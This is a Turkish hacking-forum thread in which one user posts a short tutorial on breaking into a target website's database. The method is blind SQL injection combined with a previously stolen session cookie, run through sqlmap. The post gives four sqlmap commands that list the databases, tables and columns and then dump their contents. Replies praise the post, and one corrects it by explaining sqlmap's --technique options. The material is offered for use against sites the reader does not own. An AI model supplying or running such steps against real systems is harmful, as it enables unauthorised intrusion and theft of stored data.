Blind SQL & Cookie İnjection Açığı Kullanımı (Video)

[nightstalker]

​

İstek Üzerine yazılı kısa bir anlatım yapacagım arkadaşlar.
Hedef sitemizin cookie'sini çektiğinizi ve blind SQL-i açığını buldugunuzu varsayarak anlatımıma geçiyorum.Aslında tek yaptıgımız şey --cookie parametresi ile hedef sitenin cookiesini tanımlayıp blind açığımız ile hedef sitemizin veritabanına sızmaktı..

Peki nasıl yaptık ?


Burada cookie bilgisini ve Blind SQL-i açığını tanımladık ve veritabanını çektik.


Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" --dbs

Burada çektiğimiz veritabanının içerisindeki tableları çektik.


Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database --Tables

Burada tableların içerisindeki Column'ları çektik.


Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables --columns

Son olarak columnlarımızın içerisindeki bilgiyi çekiyoruz.


Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables -C columns --dump

 

[RootAkıncı]

eline sağlık knk

 

[nightstalker]

eline sağlık knk

sağol knk

 

[RootAyyıldız]

sevgili dostum bilmeden birşeyi biliyor gibi anlatmak en büyük yanlıştır burada blind sql için yapılan bir saldırı yok bak güzel dostum çok basit bir tool sqlmap onu biraz araştırın açık kaynak kodlu bir yazılım o video da blind sql için kullanılan her hangi bir parametre yok yani burada blind sql methodu blind sql kullanımı yok sqlmap kendisi otomatik olarak saldırı tipini blind sql olarak seçiyor sqlmap içersinde --technique= parametrisi var burada gönderilecek olan vuln tipi payloadları belirtisiniz daha hızlı olması için

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries
• T: Time-based blind
• Q: Inline queries